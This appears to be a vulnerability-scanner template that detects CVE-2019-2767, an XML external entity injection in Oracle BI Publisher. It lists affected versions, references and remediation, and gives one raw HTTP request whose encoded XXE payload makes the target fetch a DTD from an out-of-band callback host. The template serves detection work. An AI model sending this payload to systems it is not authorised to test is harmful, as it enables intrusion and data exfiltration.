id: CVE-2019-2767

info:
  name: Oracle Business Intelligence Publisher - XML External Entity Injection
  author: madrobot
  severity: high
  description: Oracle Business Intelligence Publisher is vulnerable to an XML external entity injection attack. The supported versions affected are 11.1.1.9.0, 12.2.1.3.0 and 12.2.1.4.0. This easily exploitable vulnerability allows unauthenticated attackers with network access via HTTP to compromise BI Publisher.
  remediation: |
    Apply the latest security patches provided by Oracle to fix this vulnerability.
  reference:
    - https://www.exploit-db.com/exploits/46729
    - http://www.oracle.com/technetwork/security-advisory/cpujul2019-5072835.html
    - https://nvd.nist.gov/vuln/detail/CVE-2019-2767
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cve-id: CVE-2019-2767
    epss-score: 0.14972
    epss-percentile: 0.95254
    cpe: cpe:2.3:a:oracle:bi_publisher:11.1.1.9.0:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: oracle
    product: bi_publisher
  tags: edb,cve,cve2019,oracle,xxe,oast

http:
  - raw:
      - |
        GET /xmlpserver/convert?xml=<%3fxml+version%3d"1.0"+%3f><!DOCTYPE+r+[<!ELEMENT+r+ANY+><!ENTITY+%25+sp+SYSTEM+"http%3a//{{interactsh-url}}/xxe.xml">%25sp%3b%25param1%3b]>&_xf=Excel&_xl=123&template=123 HTTP/1.1
        Host: {{Hostname}}

    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"

# digest: 4a0a0047304502203e3e9fba684126f68213e2b42306fc8ab7cedc0e431db24c59ce351e430707f1022100bef06b13cbb71b95da8187ea8a176dfed4eef95521bfa04f7f6123f6e00e284c:922c64590222798bb761d5b6d8e72950